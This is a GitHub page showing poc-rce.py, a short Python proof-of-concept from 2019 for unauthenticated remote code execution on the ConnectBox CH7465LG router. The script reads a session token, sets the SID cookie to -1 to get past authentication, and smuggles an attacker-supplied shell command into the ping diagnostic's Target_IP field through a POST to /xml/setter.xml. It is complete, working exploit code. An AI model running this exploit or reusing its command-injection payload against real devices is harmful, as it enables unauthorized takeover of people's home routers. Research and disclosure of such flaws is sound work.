-
Notifications
You must be signed in to change notification settings - Fork 6
/
Copy pathpoc-rce.py
34 lines (27 loc) · 924 Bytes
/
poc-rce.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#!/usr/bin/env python3
"""
poc-rce.py: Unauthenticated Remote Code Execution for the ConnectBox (CH7465LG).
xitan - 2019 (https://xitan.me).
"""
import requests
import sys
if len(sys.argv) < 3:
print("./poc-rce.py <router-ip> <command>")
exit(1)
session = requests.Session()
index = session.get('http://' + sys.argv[1] + '/index.html', verify=False)
token = index.headers.get('Set-Cookie')[
index.headers.get('Set-Cookie').find('=') + 1:index.headers.get('Set-Cookie').find(';')]
session.cookies['SID'] = '-1'
data = {
'token': token,
'fun': '126',
'Type': '1',
'Target_IP': 'google.com"\"; ' + sys.argv[2] + ';',
'Ping_Size': '64',
'Num_Ping': '5',
'Ping_Interval': '1'
}
setter = session.post('http://' + sys.argv[1] + '/xml/setter.xml', data=data, verify=False)
if setter.status_code == 200:
print('[+] Command successfully sent.')